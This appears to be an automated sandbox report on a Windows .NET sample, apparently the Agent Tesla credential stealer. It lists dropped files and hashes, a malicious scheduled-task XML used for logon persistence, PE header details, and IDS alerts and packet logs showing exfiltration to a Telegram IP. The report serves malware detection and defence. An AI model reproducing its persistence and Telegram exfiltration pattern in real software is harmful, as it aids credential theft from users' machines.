                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):2232
                                                                  Entropy (8bit):5.380805901110357
                                                                  Encrypted:false
                                                                  SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyNs:lGLHyIFKL3IZ2KRH9Ougks
                                                                  MD5:E2041D8B64796610583A0818907F6010
                                                                  SHA1:FB12EA7BC43EFD4EFB0F8517EF2B28DB37B63773
                                                                  SHA-256:B385BC696645A7AE27DAE1DE0C6F737C14BC9266E7465E366B7A59B376E7B68A
                                                                  SHA-512:95617EA8A038226E0DA45FDB21A1EC59BA855A57B696CF018AC4CED51088D04A58B6A24F55ADFC81B8EBD73841D282D3A12D851FA90309B8681F1CF0FE9AB108
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0h2twhjl.00o.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nf4p0d0.wfo.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lgw5mrw1.0fe.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oy10pnqk.srv.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\tmp9244.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1581
                                                                  Entropy (8bit):5.101676095819727
                                                                  Encrypted:false
                                                                  SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtn+xvn:cgergYrFdOFzOzN33ODOiDdKrsuTyv
                                                                  MD5:21B54999DABB8081011508222A9917C6
                                                                  SHA1:1590369EA20195EA675500978662103CC3F34DF0
                                                                  SHA-256:2FE3120B86569FC556C35CB00843C6B7BF62371A8ADB1B635EAAEF4C24A6C5B2
                                                                  SHA-512:CE14D9DC289E262963BB65F53E00DFAB663F1FDF513CF359C5E50B8F9C25A9DA8F0323ED96F4332DA85940D8E3C6543E00282D9CD51B206DDA0E9C6E5F64540A
                                                                  Malicious:true
                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                  C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1581
                                                                  Entropy (8bit):5.101676095819727
                                                                  Encrypted:false
                                                                  SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtn+xvn:cgergYrFdOFzOzN33ODOiDdKrsuTyv
                                                                  MD5:21B54999DABB8081011508222A9917C6
                                                                  SHA1:1590369EA20195EA675500978662103CC3F34DF0
                                                                  SHA-256:2FE3120B86569FC556C35CB00843C6B7BF62371A8ADB1B635EAAEF4C24A6C5B2
                                                                  SHA-512:CE14D9DC289E262963BB65F53E00DFAB663F1FDF513CF359C5E50B8F9C25A9DA8F0323ED96F4332DA85940D8E3C6543E00282D9CD51B206DDA0E9C6E5F64540A
                                                                  Malicious:false
                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                  C:\Users\user\AppData\Roaming\vZkoWbol.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):704512
                                                                  Entropy (8bit):7.9093549080558665
                                                                  Encrypted:false
                                                                  SSDEEP:12288:p+DOcsEdTxCGyzEcO8EupwU8VqZ33ojcXuh54OrTu94PvI2BNURvbrOj6uX:pST1eEcBEHqZc8O6+Pv+X3uX
                                                                  MD5:2D9DFDB275D38155CBA293DC619430FA
                                                                  SHA1:523F6A7040F3B330E708A3E84D48A18BDCD77110
                                                                  SHA-256:9BF25EBE467E570FC91E2003B17061C765FCB54B6D505A7DB43263981504FA5F
                                                                  SHA-512:B1809D426F7C9AE847E33BB0FB935194A9CFA098CF36F664DEAF8BD6B95A414F0FC0085EFBCB79272DAF7FDF45735E8841F1BD5102421AD276B5A784B5742C44
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../..f................................. ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........B...............................................................0..A....... .........%.....(......... 2........%.g...(.....h...(....*.....&*...B... ....(......*....0..............,.".".#..(....+...*..0...............".".#. ....(....+...*...0...............".".#...(....+...*..0...................... ....(....+...*..0..+.....................(N...+....s....}......j}....*..0............{......*...0..b.......~.........E........5....... ........... .....{.....(f.......,...

                                                                  C:\Users\user\AppData\Roaming\vZkoWbol.exe:Zone.Identifier

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:false
                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.9093549080558665
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:z1E-catalogSamples.exe
                                                                  File size:704'512 bytes
                                                                  MD5:2d9dfdb275d38155cba293dc619430fa
                                                                  SHA1:523f6a7040f3b330e708a3e84d48a18bdcd77110
                                                                  SHA256:9bf25ebe467e570fc91e2003b17061c765fcb54b6d505a7db43263981504fa5f
                                                                  SHA512:b1809d426f7c9ae847e33bb0fb935194a9cfa098cf36f664deaf8bd6b95a414f0fc0085efbcb79272daf7fdf45735e8841f1bd5102421ad276b5a784b5742c44
                                                                  SSDEEP:12288:p+DOcsEdTxCGyzEcO8EupwU8VqZ33ojcXuh54OrTu94PvI2BNURvbrOj6uX:pST1eEcBEHqZc8O6+Pv+X3uX
                                                                  TLSH:6DE4230CAFE98E51C2AD07BED06394991B35D392E007FB066ED094EE1D537A2D1C5BA3
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../..f................................. ........@.. ....................... ............@................................

                                                                  File Icon

                                                                  Icon Hash:9931c5b98687b385

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4ac4fe
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x661F0F2F [Tue Apr 16 23:52:15 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xac4b00x4b.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x1600.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xaa5040xaa600efc8e9a18a1893d428d58db5ed9404c4False0.9413503645451211data7.919359410493161IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xae0000x16000x16002ad9d646792a418e4acbd118fb762c4bFalse0.7341974431818182data6.525337678803363IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xb00000xc0x200b4a6f2032cb6c7f12aac4e7429bf0505False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0xae0c80xf5dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9125349605898805
                                                                  RT_GROUP_ICON0xaf0380x14data1.05
                                                                  RT_VERSION0xaf05c0x3c0data0.4510416666666667

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  04/19/24-19:33:10.146400TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49708443192.168.2.5149.154.167.220
                                                                  04/19/24-19:33:06.739874TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49706443192.168.2.5149.154.167.220

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 19, 2024 19:33:04.543025017 CEST49705443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:04.543060064 CEST44349705104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:04.543142080 CEST49705443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:04.549525023 CEST49705443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:04.549540043 CEST44349705104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:04.776035070 CEST44349705104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:04.776119947 CEST49705443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:04.778759003 CEST49705443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:04.778769016 CEST44349705104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:04.779187918 CEST44349705104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:04.833252907 CEST49705443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:04.839976072 CEST49705443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:04.880157948 CEST44349705104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:05.080715895 CEST44349705104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:05.080806017 CEST44349705104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:05.081012011 CEST49705443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:05.086179972 CEST49705443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:05.926769018 CEST49706443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:05.926808119 CEST44349706149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:05.926922083 CEST49706443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:05.943377018 CEST49706443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:05.943392992 CEST44349706149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:06.374706984 CEST44349706149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:06.374838114 CEST49706443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:06.379019976 CEST49706443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:06.379031897 CEST44349706149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:06.379702091 CEST44349706149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:06.381182909 CEST49706443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:06.424124002 CEST44349706149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:06.739763021 CEST49706443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:06.739792109 CEST44349706149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:06.784132957 CEST44349706149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:06.833724976 CEST49706443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:07.060884953 CEST44349706149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:07.061027050 CEST44349706149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:07.061683893 CEST49706443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:07.063458920 CEST49706443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:08.187604904 CEST49707443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:08.187648058 CEST44349707104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:08.187719107 CEST49707443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:08.192867041 CEST49707443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:08.192883015 CEST44349707104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:08.409291983 CEST44349707104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:08.409404039 CEST49707443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:08.410854101 CEST49707443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:08.410876989 CEST44349707104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:08.411217928 CEST44349707104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:08.458276987 CEST49707443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:08.469510078 CEST49707443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:08.512125015 CEST44349707104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:08.728996992 CEST44349707104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:08.729065895 CEST44349707104.26.12.205192.168.2.5
                                                                  Apr 19, 2024 19:33:08.729173899 CEST49707443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:08.732484102 CEST49707443192.168.2.5104.26.12.205
                                                                  Apr 19, 2024 19:33:09.367854118 CEST49708443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:09.367889881 CEST44349708149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:09.367966890 CEST49708443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:09.368558884 CEST49708443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:09.368577003 CEST44349708149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:09.784562111 CEST44349708149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:09.784634113 CEST49708443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:09.786276102 CEST49708443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:09.786286116 CEST44349708149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:09.786612034 CEST44349708149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:09.790388107 CEST49708443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:09.836112022 CEST44349708149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:10.146270037 CEST49708443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:10.146298885 CEST44349708149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:10.192652941 CEST44349708149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:10.239518881 CEST49708443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:10.562978029 CEST44349708149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:10.563059092 CEST44349708149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:33:10.563335896 CEST49708443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:33:10.563536882 CEST49708443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:34:13.260236979 CEST49717443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:34:13.260274887 CEST44349717149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:34:13.260374069 CEST49717443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:34:13.260674953 CEST49717443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:34:13.260688066 CEST44349717149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:34:13.682372093 CEST44349717149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:34:13.694485903 CEST49717443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:34:13.694502115 CEST44349717149.154.167.220192.168.2.5
